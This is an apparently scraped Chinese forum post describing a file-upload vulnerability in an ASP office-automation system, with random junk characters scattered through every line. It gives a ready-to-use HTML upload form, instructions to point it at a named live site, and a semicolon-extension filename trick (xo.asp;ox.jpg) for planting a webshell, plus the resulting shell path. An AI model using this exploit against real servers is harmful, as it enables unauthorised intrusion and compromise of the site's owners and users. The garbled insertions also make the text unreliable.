全能OA办公系统 上传漏洞
' @# {4 r! S. T# P0 Q) @9 w# ]0 f! L Z3 j
系统介绍:
9 m' F" P3 K% p8 H1 {
X7 p5 N1 i& K0 I1 s5 v8 f全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。7 n& q2 [$ l" g& s& d/ T) a/ o! f
& z' u) k. n5 u% F; E主要功能:
7 E$ O9 ^: c( i4 y1 b% K公司通告 : t9 l4 k( |) X+ x6 Y3 x. W
工作计划
* _% ` m' ~1 w通讯助理
% c- d3 l- K# H0 s: l8 J0 L客户资源 / u3 b" _9 n; L# _/ O% P
我的公文 4 c/ \4 h! c4 D3 s9 z% Y- L ?" |2 R
公文传阅 ! R8 k& N9 x4 {4 o5 P7 {8 c
公共资源 ; U! n8 v7 U3 R: ~
资源预约 + g& Z+ `( h% E" A% F* b5 e x0 Y+ I
今日考勤
6 ?4 Z+ w" f* R7 y2 L$ ?个人计划
" K, a! M. m* c7 f4 @, l0 U X1 L个人通讯录
& M, W, W0 J- u/ ?6 a$ l* B- N个人基本档案
! ?6 e3 G2 \- m# ^未读邮件 " w. U$ P) K" z1 w2 J
发邮件
7 p. d5 p; i+ O& V% a收件夹 ) K" C4 U) e/ \1 k' I* Y
寄件夹 , c# d0 ?* U% q6 F
网络硬盘 + F% X0 ^' v9 u5 J
网络会议
3 Q- d3 j/ L! y+ B( d( z0 e. f网络调查
: ?* ]. W4 X0 X+ K交流论坛4 m% H; i9 n3 U$ d
$ ?, Z! {4 D' R有兴趣测试的朋友可以下源码看看
- J- _0 {1 b; M8 F+ ^# j* s0 N, T
源码下载:: Q" i2 |8 j: w' c1 D
+ u0 m! ] T/ {$ h( j( W4 xhttp://www.mycodes.net/30/4750.htm) W6 r( [7 m$ y0 w/ f3 }9 `
1 A9 ~* [) Y/ E$ k漏洞介绍:" g" d2 b* P5 T% w4 }2 K
- X" i2 T5 _3 B1 @8 L6 p由upfile.asp上传文件漏洞引起
9 j- x7 a; N0 C W5 `- J9 ~" {2 n2 y- {' p R
测试方法:+ }1 a) h5 \$ E& f# k
& B1 a6 z1 L7 J. b2 l使用名小子上传http://www.itlynn.com/upfile.asp即可2 ]6 y( }0 q5 y7 \: ]( B* F4 x
4 T, T& L; c$ L" D6 w& ^3 U如果upfile.asp文件被删除不存在。& V* m; G' i1 @$ g2 v
4 R/ Y& @! I; a9 e
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
$ x' o- d& |1 V) A! i' [% J- t3 T3 l6 K
如果存在那么将如下代码保存为upfile.html。
6 h/ R/ }8 R, T# } x: J; p& L1 C+ d" H3 d
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。# B% l7 |0 ~/ A5 g% j" M3 F4 P
7 P# F3 _9 i/ G/ U
: c8 L# z: s$ [; M" ~# B5 g: t8 e: p
1 l% @9 m3 N3 e+ e( S0 s01 <table border='0' align="center" cellpadding="5"> 2 Y8 b7 Y6 n8 _+ e) i
8 p& t6 g* i( N& U* c V% |! A0 I) m5 @
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 2 t0 ^' W Y$ V# o: m6 e
% W* s1 q, E6 d) s
03 <tr> ) u8 h/ }# v! t8 p% U2 H2 K+ [
3 H/ d' ^3 T* E5 a [" H04 <td>报错:</td> 2 h! ?* I- h( |+ ]2 A* a' A# F1 n
4 n' R0 y( z f7 m9 T( y
05 <td><input type='radio' name='errnumber' value='0'> % M* |0 V% ?5 w! b7 t. f
! G+ R0 ~5 ? n5 c$ t2 `) g
06 自动更名
& t1 O$ w2 h; Z/ {& m
. s( M: ^3 U8 e7 i07 <input type='radio' name='errnumber' value='1' checked>
4 |' U5 N# m. W0 |
4 E1 K# @: v& t: e08 报错方式
1 O4 q. ?6 O6 [7 S) R$ O* C# _7 U; u W
09 <input type='radio' name='errnumber' value='2'>
9 p8 P9 z( f% u+ w+ v5 z" d
& S" T- v. W1 g* I2 v' N10 直接覆盖</td>
/ N8 u3 ]2 Y( N: j! S+ S _
7 M( [9 `% J! V j7 J- u11 </tr>
$ N$ B6 h$ i ^7 d2 f, W% ~8 T2 |% G1 u& ~6 ?
12 <tr> 7 V5 ]" I4 f: l
6 }) r& N w; S: J0 N13 <td>主题:</td>
* T, x! L, |- i& K' W7 H
& {/ n t9 N+ I4 ^% z5 B14 <td><input type='text' name='filename' size='30'></td> q6 |; i% z( K$ p
$ i/ c/ H0 u7 k- r2 [15 </tr> ' V+ A+ A" o" U; q
# }4 |2 O' Z/ F7 s L' q
16 <tr> 4 h& r2 { ?/ Z9 H. j
: n3 ?- P6 ?. i) L9 |& Q
17 <td>文件:</td> # u4 v5 [% T- Y( x
3 B" q" L, d2 {8 a0 v18 <td><input type="file"name="fruit"size="30"></td> - g4 D+ K% B' j
4 Q* Q: y6 ^. P# y+ ^' L/ j0 x
19 </tr> 0 K- T7 m1 e( H( o
3 r, k8 Z! Z4 ?" v* ~2 h* V/ l
20 <tr> $ x) V1 h a, H
2 f8 ]* B% a6 I3 s7 u, g21 <td valign='top'>简介:</td> 8 Z; m( c- n( @6 X
9 O# Y5 t- e# C* K4 k
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 1 b* q& T, N! T9 K5 k# ]
0 |5 F- @- O _23 </tr>
3 Q w9 m3 y% ?
: Y( T/ ~2 g, @24 ( \: c% d! g T
5 }: z0 s+ s! P2 K1 E25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
2 ?+ B }8 c! `$ a% Z) v, Y# U+ G& |
26 </tr> 2 e7 u/ n% M; A) `8 a6 T: e
8 j6 f( t8 \& M% c$ |/ n! \7 B
27 </form>
& G: n+ J# A' b
G3 A* x8 F0 G然后打开上传一个文件名为xo.asp;ox.jpg的文件。) G& v8 e$ N3 N" s
, I7 H# N/ u/ V* j; _2 n- E
4 f5 \; t! f0 V% \/ c3 ~
* ^) J- o! X7 h! u' x$ K上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
# q( A1 c1 m5 u* f: s# ?4 i1 I0 v/ {: D& v0 c
此漏洞需要配合解析漏洞利用。
$ H1 e `; }5 B) r3 G9 v4 ^5 Z8 S! a V; ]+ P
|